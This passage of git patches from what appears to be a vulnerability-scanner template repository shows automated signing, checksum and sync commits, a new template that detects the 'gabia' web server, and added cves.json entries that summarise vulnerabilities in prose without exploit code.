b/http/misconfiguration/installer/snipe-it-installer.yaml index d3646c227e..ce1ce6709b 100644 --- a/http/misconfiguration/installer/snipe-it-installer.yaml +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ubersmith-installer.yaml b/http/misconfiguration/installer/ubersmith-installer.yaml index f8b8218812..9d749a1770 100644 --- a/http/misconfiguration/installer/ubersmith-installer.yaml +++ b/http/misconfiguration/installer/ubersmith-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022052a003d038d9b265499b84d6301697b5740af3328121ce22b33deaf522fb0f9b02202b3af6afa1ab2ccdbb7887991dc379bec0e673fb90462d403d00662d8191ded7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From edc73f5b7cc52859071f4893a3cdf919597d45de Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:16:08 +0000 Subject: [PATCH 440/847] Auto Generated New Template Addition List [Wed May 29 08:16:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d53ff6a0fd..742727d535 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml +http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml From 00cc12ebd85da2dd10d4f780a7aec7db00fd86f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:16:20 +0000 Subject: [PATCH 441/847] Auto Generated Templates Checksum [Wed May 29 08:16:20 UTC 2024] :robot: --- templates-checksum.txt | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a5ebc69c09..4718a3209a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3756,6 +3756,7 @@ http/exposed-panels/dell-wyse-login.yaml:48ff68728102023bc2877e3a7edb874644900a4 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:14f6893b5cf90d837dfcd3539276a87995114da6 http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 +http/exposed-panels/digital-watchdog-panel.yaml:8148885c57f0f158ef852b1124c85c6259077073 http/exposed-panels/digitalrebar-login.yaml:c43de0bee9718e24c9d224e8ea6df0208533f9c2 http/exposed-panels/directadmin-login-panel.yaml:82b98e41b8c2d8c8acb2133c10860bf4cee4df2c http/exposed-panels/directum-login.yaml:df68d6cb3b75935a403fa6254f29a7278619e0d7 @@ -3852,8 +3853,9 @@ http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml:237d07426d4e4a893b240d http/exposed-panels/fortinet/fortinet-panel.yaml:f1798cfb14f2f54edc3d6746a402d1716659e65c http/exposed-panels/fortinet/fortios-management-panel.yaml:c7c0c4b9eed1b1a4546c3655439186718078d591 http/exposed-panels/fortinet/fortios-panel.yaml:d7766874f165089c3e1539b84d46d46984c52ae5 +http/exposed-panels/fortinet/fortisiem-panel.yaml:710ad79df9bd04ed0c736f797cde35d22263bb12 http/exposed-panels/fortinet/fortitester-login-panel.yaml:e366bffb4008cbd19a32a104d93251a042fdcbbf -http/exposed-panels/fortinet/fortiweb-panel.yaml:6893382e70ed550bd9f342d6e24e3a41ec921165 +http/exposed-panels/fortinet/fortiweb-panel.yaml:7e2b08c3cbed4015bfa950366ff8affa439ba810 http/exposed-panels/fortinet/fortiwlm-panel.yaml:3260c3235302198e0168fba0ed389bc474ddfbd5 http/exposed-panels/freeipa-panel.yaml:0068757bb30eded3c0d933ee11d417e1800a854d http/exposed-panels/freepbx-administration-panel.yaml:3c250e83cf97aa3ef95b1c881b173a79e8cc7876 @@ -5150,6 +5152,7 @@ http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 +http/iot/netgear-boarddataww-rce.yaml:6fa4f7421844e5385aac788c6f0d2d222156c8a1 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -5454,7 +5457,7 @@ http/misconfiguration/installer/joomla-installer.yaml:3c61ec0cf21b65088e1392f2f5 http/misconfiguration/installer/justfans-installer.yaml:a0589926d5a3ca938dd300000c6e260ba8ffe7f2 http/misconfiguration/installer/klr300n-installer.yaml:417ba88bb2ce1a6aced0dfacfa77021a62f73487 http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 -http/misconfiguration/installer/librenms-installer.yaml:333655623dee73fdc147ce0e6b93ff5035b30743 +http/misconfiguration/installer/librenms-installer.yaml:918045c9f38e3d800119f1c8a2c2062a47a20509 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f http/misconfiguration/installer/lychee-installer.yaml:62abd9489fe78e56935daee247bf8314e1bd279e @@ -5511,7 +5514,7 @@ http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1 http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9 http/misconfiguration/installer/sms-installer.yaml:c9d601c3fcdab053214228580512c01923e6aeb3 -http/misconfiguration/installer/snipe-it-installer.yaml:d344b83caa3a3823c89653eee76405375aa9527b +http/misconfiguration/installer/snipe-it-installer.yaml:582748ffd95ef18e4a27db008da5629f8d209be2 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f @@ -5526,7 +5529,7 @@ http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7 http/misconfiguration/installer/trilium-notes-installer.yaml:c3bc11c9c011dd659ca6af6d6ddbf4907495d69e http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 -http/misconfiguration/installer/ubersmith-installer.yaml:301fd89b0899f53334a28e3434c2b14ba2df9ae5 +http/misconfiguration/installer/ubersmith-installer.yaml:d3f99788e31b13c9717ad3ae9040abdc29ae192a http/misconfiguration/installer/umbraco-installer.yaml:468d300c5078cf4f972eabf51e9452bcdc8ffbb4 http/misconfiguration/installer/unifi-wizard-install.yaml:e7bd820e772c8d6c4b72b9fc69809ef8561d251e http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml:8d8e12dccb52a4754d1c1ac579401f21a4c6913b @@ -8598,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5f3494f76751f8b9761a306f97ff83ba1dcda1d0 +templates-checksum.txt:b2894935f81a261f0f8454fdbf5d1b55c1492e4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2b0b2afbe01708b9f749f16e6ba0d32b0bbabda6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 29 May 2024 08:16:53 +0000 Subject: [PATCH 442/847] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5050b10a5a..b1b12f984b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,9 +17,11 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' + - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' From 2e8532c4496bf02ab6b97c124d506ede6d607260 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:18:04 +0000 Subject: [PATCH 443/847] Auto Template Signing [Wed May 29 08:18:04 UTC 2024] :robot: --- http/exposed-panels/digital-watchdog-panel.yaml | 1 + http/iot/netgear-boarddataww-rce.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index a347524716..7818badec2 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -25,3 +25,4 @@ http: - type: dsl dsl: - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" +# digest: 4b0a00483046022100e849b952b0ea96f568c0746acad027fb76ea85738d9e5621a94afaa79103f005022100b9d51a990553586b7768ff6474f128f3d0e607497de83d955f6a67084e7d5c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 7609c7043a..4aabb1a762 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b6c61c87467289005949eec183a02c9dc2bff7f2f32e4157ad72a0fc2b0cd66e02200cc90f2e20e5fc9c629d08a84e24a7f02bc37a1e421341a749496f7619f14fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8f1c5f2ad20c69afd5dc2020804878c9a1da43fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 14:12:11 +0530 Subject: [PATCH 444/847] Create gabia-server-detect.yaml --- http/technologies/gabia-server-detect.yaml | 35 ++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/technologies/gabia-server-detect.yaml diff --git a/http/technologies/gabia-server-detect.yaml b/http/technologies/gabia-server-detect.yaml new file mode 100644 index 0000000000..e6249d5acf --- /dev/null +++ b/http/technologies/gabia-server-detect.yaml @@ -0,0 +1,35 @@ +id: gabia-server-detect + +info: + name: Gabia Server - Detection + author: jadu101 + severity: info + description: | + Detects gabia web server. + metadata: + verified: true + max-request: 1 + shodan-query: "Server: gabia" + tags: tech,gabia,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Server: gabia" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server From 9dd673d15d48dc763bc8fc7e1a9eba3ee4363c53 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:47:42 +0000 Subject: [PATCH 445/847] Auto Generated Templates Checksum [Wed May 29 08:47:42 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4718a3209a..1792f9bfa6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3756,7 +3756,7 @@ http/exposed-panels/dell-wyse-login.yaml:48ff68728102023bc2877e3a7edb874644900a4 http/exposed-panels/delta-login-panel.yaml:267b229446b591002e087e0e97ef21cc89e69553 http/exposed-panels/deluge-webui-panel.yaml:14f6893b5cf90d837dfcd3539276a87995114da6 http/exposed-panels/dericam-login.yaml:36507c070822641fa657c4571b0168973bc3fbf7 -http/exposed-panels/digital-watchdog-panel.yaml:8148885c57f0f158ef852b1124c85c6259077073 +http/exposed-panels/digital-watchdog-panel.yaml:3bb409f16d3069ab7d223e27007ede75a61a655b http/exposed-panels/digitalrebar-login.yaml:c43de0bee9718e24c9d224e8ea6df0208533f9c2 http/exposed-panels/directadmin-login-panel.yaml:82b98e41b8c2d8c8acb2133c10860bf4cee4df2c http/exposed-panels/directum-login.yaml:df68d6cb3b75935a403fa6254f29a7278619e0d7 @@ -5152,7 +5152,7 @@ http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:6fa4f7421844e5385aac788c6f0d2d222156c8a1 +http/iot/netgear-boarddataww-rce.yaml:2ed1aa424c78d57f9978c72b9f3fa3d6e99b9c08 http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -8601,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b2894935f81a261f0f8454fdbf5d1b55c1492e4e +templates-checksum.txt:aab4de2297091fcd9b0008bf2a1d84dcf4593c88 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7995528b411058beead9edd45311a814845e40a9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 08:50:51 +0000 Subject: [PATCH 446/847] Auto Generated cves.json [Wed May 29 08:50:51 UTC 2024] :robot: --- cves.json | 8 ++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index b5bbba72c0..7fea183947 100644 --- a/cves.json +++ b/cves.json @@ -1607,6 +1607,7 @@ {"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1439.yaml"} {"ID":"CVE-2022-1442","Info":{"Name":"WordPress Metform \u003c=2.1.3 - Information Disclosure","Severity":"high","Description":"WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1442.yaml"} {"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1574.yaml"} +{"ID":"CVE-2022-1580","Info":{"Name":"Site Offline WP Plugin \u003c 1.5.3 - Authorization Bypass","Severity":"medium","Description":"The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2022/CVE-2022-1580.yaml"} {"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"} {"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"} {"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"} @@ -1830,6 +1831,7 @@ {"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"} {"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"} {"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"} +{"ID":"CVE-2022-34534","Info":{"Name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","Severity":"high","Description":"Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34534.yaml"} {"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"} {"ID":"CVE-2022-34590","Info":{"Name":"Hospital Management System 1.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-34590.yaml"} {"ID":"CVE-2022-34753","Info":{"Name":"SpaceLogic C-Bus Home Controller \u003c=1.31.460 - Remote Command Execution","Severity":"high","Description":"SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-34753.yaml"} @@ -2020,6 +2022,7 @@ {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} {"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"} +{"ID":"CVE-2023-2059","Info":{"Name":"DedeCMS 5.7.87 - Directory Traversal","Severity":"medium","Description":"Directory traversal vulnerability in DedeCMS 5.7.87 allows reading sensitive files via the $activepath parameter.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-2059.yaml"} {"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"} {"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"} {"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"} @@ -2129,6 +2132,7 @@ {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} {"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} +{"ID":"CVE-2023-3077","Info":{"Name":"MStore API \u003c 3.9.8 - SQL Injection","Severity":"critical","Description":"The MStore API WordPress plugin before 3.9.8 is vulnerable to Blind SQL injection via the product_id parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3077.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} @@ -2296,6 +2300,7 @@ {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} +{"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} {"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC 